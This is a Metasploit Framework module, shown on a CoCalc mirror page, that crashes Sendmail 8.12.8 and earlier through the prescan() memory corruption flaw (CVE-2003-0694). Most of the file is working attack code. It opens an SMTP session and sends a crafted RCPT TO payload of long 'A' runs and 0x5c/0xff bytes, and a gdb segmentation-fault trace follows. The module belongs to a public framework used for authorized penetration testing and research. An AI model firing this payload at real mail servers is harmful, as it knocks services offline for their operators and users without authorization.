CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/smtp/sendmail_prescan.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Smtp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'Sendmail SMTP Address prescan Memory Corruption',

13
      'Description'    => %q{

14
        This is a proof of concept denial of service module for Sendmail versions

15
        8.12.8 and earlier. The vulnerability is within the prescan() method when

16
        parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00

17
        bytes can be used, limiting the likelihood for arbitrary code execution.

18
      },

19
      'Author'         => [ 'aushack' ],

20
      'References'     =>

21
        [

22
          [ 'OSVDB', '2577' ],

23
          [ 'CVE', '2003-0694' ],

24
          [ 'BID', '8641' ],

25
          [ 'EDB', '24' ]

26
        ],

27
      'DisclosureDate' => '2003-09-17'))

28
  end

29


30
  def run

31
    begin

32
      connect

33
      # we use connect instead of connect_login,

34
      # because we send our own malicious RCPT.

35
      # however we want to make use of MAILFROM

36
      # and raw_send_recv()

37
      #select(nil,nil,nil,23) # so we can attach gdb to the child PID

38


39
      sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28

40


41
      raw_send_recv("EHLO X\r\n")

42
      raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")

43
      print_status("Sending DoS packet.")

44
      raw_send_recv("RCPT TO: #{sploit}\r\n")

45


46
      disconnect

47
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

48
      print_status("Couldn't connect to #{rhost}:#{rport}")

49
    rescue ::EOFError

50
      print_status("Sendmail stopped responding after sending trigger - target vulnerable.")

51
    end

52


53
  end

54
end

55


56
=begin

57
Program received signal SIGSEGV, Segmentation fault.

58
0x8073499 in ?? ()

59
(gdb) bt

60
#0   0x807e499 in ?? ()

61
#1   0x087e125 in ?? ()

62
#2   0x5c5c5c5c in ?? ()

63
Error accessing memory address 0x5c5c5c5c: Bad address.

64
=end

65


66